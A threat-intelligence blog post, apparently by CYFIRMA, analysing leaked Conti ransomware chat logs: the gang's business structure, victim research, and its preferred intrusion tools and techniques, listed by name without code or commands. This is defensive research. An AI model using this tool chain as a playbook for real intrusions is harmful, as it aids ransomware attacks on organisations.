Conti gang is one of the largest cybercrime syndicates in the world. Third-party blockchain analysis of their bitcoin wallets estimates up to USD 200 million of annual revenue. Recently leaked chat logs of the group provide unprecedented insight into the life and operations of the gang. From asking leave approval to internal cybersecurity or TTPs used in attacks, these leaks are sure to be studied by analysts for weeks and months to come. Our research team at CYFIRMA has focused mainly on extracting IOCs and TTPs but has also observed interesting insights about the gang’s inner workings.

How are they organized?

After the arrest of REvil members, the Conti gang is now dominating the scene of so-called “big game hunting” groups (focused only on large companies with above USD 100m in annual revenue). Insights into their leaked conversations confirm what threat researchers, including at CYFIRMA – as part of our 2022 Predictions [https://www.cyfirma.com/cyfirma-cybersecurity-predictions-2022/] – have suspected and speculated. Top cybercriminal gangs are organized and operate as a business within their little industry of cybercrime. This includes outsourcing, for example, initial access brokers, typical HR problems, physical offices, and of course, performance reviews.

With the RaaS business booming, the need for reliable talent from low-level programmers to highly skilled pentesters has grown as well. In leaked chat logs, there are conversations of dedicated HR personnel and promotions of referral programs with bonuses. Particularly fascinating and shady is the practice of abusing legitimate headhunting services to hire employees who have no idea who they really are working for. The pressing matter appears to be talent retention as the pay is not too great, working hours are grueling and work is a repetitive cycle of monotonous tasks at Conti “company”.

Also discussed are operational issues of inconsistency and struggle to maintain its infrastructure. Domains, VPNs, and other services are not being properly tracked and renewed on time, causing issues for networks of compromised hosts calling said domains and so on. High turnover of employees also seems to cause human errors in the malware itself, where simple misconfigurations result in unsuccessful breaches and loss of profit.

How do they operate?

Before we jump into hacking and tools used, it is noteworthy to mention the use of business intelligence by Conti to learn about their victims. They are particularly interested in reported revenue and information about available cash or if an organization has ransomware/cybersecurity insurance. They also look for contacts of executives or board members in order to harass them and force out the ransom. Two paid tools that were specifically mentioned were ZoomInfo and Crunchbase.

Another interesting observation is shopping for all sorts of cybersecurity products. Naturally, they want to protect themselves against being hacked by the competition or law enforcement, so they buy Antivirus products and EDR solutions for their defense. At the same time, they are buying licenses of all major cybersecurity products to test their own malware and TTPs to keep it functional and stay at least one step ahead in this never-ending cat and mouse race.

The final point is their suspected collaboration with Russian government agencies. While there is still no concrete evidence even with these leaks, there are mentions of the FSB agency and Conti allegedly attacking an organization to gather information for FSB.

How do they attack – TTPs?

From extracted IOC and TTPs by CYFIRMA, there is a clear absence of any initial access materials implying heavy reliance on initial access brokers and affiliates to take care of this side of the business. From the snippet below it appears that Conti’s focus is on the speed of lateral movement and access to emails.

The snippet of GitHub repositories mentioned in leaked Conti chat logs

Download the links Conti Ransomware_Mar 2022_GitHub.

While there are a lot more TTPs and CVEs that the CYFIRMA research team extracted from the leaks on GitHub and beyond, this snippet illustrates some of Conti’s favorites. It is clear that they are not trying to re-invent the wheel, rather relying heavily on existing and readily available tools. Their coders focus on locker code and botnet networks.

Combining the previously leaked playbook of Conti, with these recent chat leaks, we can quite clearly see preferred protocols and systems to exploit and tools used for it. Once initial access is obtained, usually, from 3rd party brokers, Conti is well equipped to establish persistence and move laterally for maximum damage in the shortest amount of time possible.

Here are observations of the CYFIRMA research team.

1. Native OS commands, tools, and PowerShell have become a universal way to execute the most or even entire attack flow. They are already present in victims’ networks increasing crucial speed and detection evasion. Nearly all tools leveraged are being used in their PowerShell versions, including Mimikatz and PowerSploit.
2. Heavy reliance on Cobalt Strike and its malleable C2 configuration. A large portion of observed GitHub repositories were all dedicated to Cobalt Strike and its configurations, including better menu options for the framework.
3. SMB and RDP are protocols of choice for lateral movement in Conti’s arsenal of tools for both scanning these protocols and directly exploiting their vulnerabilities. Conti has been particularly quick to adopt the latest vulnerability SMB and RDP exploits, such as PrintNightmare.
4. In the initial stages of an attack, Conti seems to prefer the Kerberoasting attack if a large volume of more than 3k hosts is discovered. They refer to bots and shares dumping continuity/stability as it is hours long process during network discovery and enumeration.
5. Mimikatz, UAC Bypass, and Zerologon are a privilege escalation holy trinity with some help of NTDS dumps. These tools and TTPs appear to be a reliable toolkit that works for most of their victims. There are a whole plethora of other mentions, but these and especially PowerShell Mimikatz are the gold standard for the gang.
6. As no surprise comes the frequent presence of MS Exchange RCE exploits. If attackers could pick one data set to extort the victim for money, it would be the email.
7. When it comes to data exfiltration, usage of the Mega.io platform with the “rclone.exe” tool has been the top choice of the gang for some time. We have also found the DNS Tunneling PowerShell tool “Invoke-DNSteal”.

Conclusion and look into the future

It has been very insightful to see the Conti gang’s preferred methods and tools and how they operate. Like anyone else, they like to stick to what works and incrementally make changes to ensure it keeps working without drastically changing any part of their playbook. From a threat research and defense perspective, this provides valuable information on what to focus on. Notable is the universal adoption of OS native tools and PowerShell, which is very likely going to evolve further into living off the land.

From the organizational perspective, their somewhat impressive and unexpected “ordinary business” structure still has major problems and clearly struggles with issues of efficiency and consistency. However, we can expect that these will get ironed out and consequently, the gang will continue to get better and more dangerous to organizations around the world.

Finally, many are speculating if this is the end of Conti. And it likely is not. They have had leaks before and from the size of their operation, it seems they are almost too big to fail. There is also a suspected connection to the Russian government which makes the discontinuation of Conti even less likely. If it comes to the worst, they are most likely to go with the time-proven strategy of taking a break and coming back stronger than ever with a re-brand.